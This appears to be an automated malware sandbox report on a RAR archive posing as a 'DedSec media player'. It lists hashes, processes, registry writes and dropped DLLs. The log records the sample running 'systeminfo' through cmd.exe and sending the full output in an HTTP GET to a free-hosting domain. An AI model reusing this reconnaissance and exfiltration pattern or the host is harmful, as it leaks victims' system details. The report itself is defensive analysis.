| File name: | DedSec media player decypted dedsec own file.rar |
| Full analysis: | https://app.any.run/tasks/c1224e2d-7ab4-4787-a71c-3993a1948785 |
| Verdict: | Malicious activity |
| Analysis date: | June 09, 2020, 22:07:02 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | application/x-rar |
| File info: | RAR archive data, v4, os: Win32 |
| MD5: | 69D6CC8CCE592A43A95EDE0C15A0570C |
| SHA1: | 5614FA06CFB56DAAA36A786B617E2980E733018C |
| SHA256: | 449C114FBA8B13047106F2C8965A1B4BF01740A3715B0EBEB8C65676263D83FC |
| SSDEEP: | 12288:GTRqx3yDX2Juzg0Vk/AxOl3m2lhelPPFilAIZwLzt1hgtluSdD5:93azgqKAg3bl0WTZwLlgtASt5 |
| .rar | | | RAR compressed archive (v-4.x) (58.3) |
|---|---|---|
| .rar | | | RAR compressed archive (gen) (41.6) |
| CompressedSize: | 25041 |
|---|---|
| UncompressedSize: | 76800 |
| OperatingSystem: | Win32 |
| ModifyDate: | 2020:05:07 08:12:21 |
| PackingMethod: | Normal |
| ArchivedFileName: | Vlc.DotNet.Core.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 820 | "C:\Users\admin\Desktop\DedSec Media Player-Cleaned.exe.exe" | C:\Users\admin\Desktop\DedSec Media Player-Cleaned.exe.exe | — | explorer.exe | |||||||||||
User: admin Company: DedSec Integrity Level: MEDIUM Description: DedSec Media Player Exit code: 3221226540 Version: 1.0.0.0 Modules
| |||||||||||||||
| 1924 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DedSec media player decypted dedsec own file.rar" | C:\Program Files\WinRAR\WinRAR.exe | explorer.exe | ||||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 Modules
| |||||||||||||||
| 3084 | "C:\Windows\System32\cmd.exe" /c systeminfo > C:\Users\admin\AppData\Local\Temp\hsdkfhsd | C:\Windows\System32\cmd.exe | — | DedSec Media Player-Cleaned.exe.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3560 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Exit code: 0 Version: 7.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3724 | "C:\Users\admin\Desktop\DedSec Media Player-Cleaned.exe.exe" | C:\Users\admin\Desktop\DedSec Media Player-Cleaned.exe.exe | explorer.exe | ||||||||||||
User: admin Company: DedSec Integrity Level: HIGH Description: DedSec Media Player Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| 4068 | systeminfo | C:\Windows\system32\systeminfo.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Displays system information Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12F\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\12F\52C64B7E |
| Operation: | write | Name: | @C:\Windows\system32\NetworkExplorer.dll,-1 |
Value: Network | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\DedSec media player decypted dedsec own file.rar | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (1924) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\Vlc.DotNet.Forms.Players.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\Vlc.DotNet.Forms.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\VlcHardwareCompatibility-Cleaned_constantsdec_patched_patched_deobfuscated_fix_deobfuscated_intsdec_decryptedmethods_fix.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\Vlc.Net.Interlops.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\Vlc.Text.Fundamentals.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\VlcAbout.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\VlcHardwareCompatibility.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\VlcManager.dll | executable | |
MD5:— | SHA256:— | |||
| 1924 | WinRAR.exe | C:\Users\admin\Desktop\DedSec Media Player-Cleaned.exe.exe | executable | |
MD5:— | SHA256:— | |||
| 3084 | cmd.exe | C:\Users\admin\AppData\Local\Temp\hsdkfhsd | text | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3724 | DedSec Media Player-Cleaned.exe.exe | GET | 410 | 145.14.145.222:80 | http://checkidphp.000webhostapp.com/id.php?ID=admin75D41F99A857CF89059B284F63675DA8EFB06854C549C881559A2CD48430763BD8834BAD32ACFAEA704E61B1249C432E497CB472AC03F803A3EF2016B35CAA76&info=HostName:USER-PC%3Cbr%3EOSName:MicrosoftWindows7Professional%3Cbr%3EOSVersion:6.1.7601ServicePack1Build7601%3Cbr%3EOSManufacturer:MicrosoftCorporation%3Cbr%3EOSConfiguration:StandaloneWorkstation%3Cbr%3EOSBuildType:MultiprocessorFree%3Cbr%3ERegisteredOwner:admin%3Cbr%3ERegisteredOrganization:%3Cbr%3EProductID:00371-461-2203502-85564%3Cbr%3EOriginalInstallDate:10/5/2017,10:19:56AM%3Cbr%3ESystemBootTime:6/9/2020,10:43:30PM%3Cbr%3ESystemManufacturer:DELL%3Cbr%3ESystemModel:DELL%3Cbr%3ESystemType:X86-basedPC%3Cbr%3EProcessor(s):1Processor(s)Installed.%3Cbr%3E[01]:x64Family6Model94Stepping3GenuineIntel~3600Mhz%3Cbr%3EBIOSVersion:DELLDELL,1/1/2011%3Cbr%3EWindowsDirectory:C:%5CWindows%3Cbr%3ESystemDirectory:C:%5CWindows%5Csystem32%3Cbr%3EBootDevice:%5CDevice%5CHarddiskVolume1%3Cbr%3ESystemLocale:en-us;English(UnitedStates)%3Cbr%3EInputLocale:en-us;English(UnitedStates)%3Cbr%3ETimeZone:(UTC)Dublin,Edinburgh,Lisbon,London%3Cbr%3ETotalPhysicalMemory:3,584MB%3Cbr%3EAvailablePhysicalMemory:3,012MB%3Cbr%3EVirtualMemory:MaxSize:7,166MB%3Cbr%3EVirtualMemory:Available:6,616MB%3Cbr%3EVirtualMemory:InUse:550MB%3Cbr%3EPageFileLocation(s):C:%5Cpagefile.sys%3Cbr%3EDomain:WORKGROUP%3Cbr%3ELogonServer:%5C%5CUSER-PC%3Cbr%3EHotfix(s):16Hotfix(s)Installed.%3Cbr%3E[01]:KB2849697%3Cbr%3E[02]:KB2849696%3Cbr%3E[03]:KB2841134%3Cbr%3E[04]:KB2670838%3Cbr%3E[05]:KB2533623%3Cbr%3E[06]:KB2534111%3Cbr%3E[07]:KB2639308%3Cbr%3E[08]:KB2729094%3Cbr%3E[09]:KB2731771%3Cbr%3E[10]:KB2786081%3Cbr%3E[11]:KB2834140%3Cbr%3E[12]:KB2882822%3Cbr%3E[13]:KB2888049%3Cbr%3E[14]:KB2999226%3Cbr%3E[15]:KB4019990%3Cbr%3E[16]:KB976902%3Cbr%3ENetworkCard(s):1NIC(s)Installed.%3Cbr%3E[01]:Intel(R)PRO/1000MTNetworkConnection%3Cbr%3EConnectionName:Connection%3Cbr%3EDHCPEnabled:No%3Cbr%3EIPaddress(es)%3Cbr%3E[01]:192.168.100.219%3Cbr%3E[02]:fe80::a179:b3ff:199:2314 | US | html | 16.5 Kb | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3724 | DedSec Media Player-Cleaned.exe.exe | 145.14.145.222:80 | checkidphp.000webhostapp.com | Hostinger International Limited | US | shared |
Domain | IP | Reputation |
|---|---|---|
checkidphp.000webhostapp.com |
| shared |
PID | Process | Class | Message |
|---|---|---|---|
1040 | svchost.exe | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |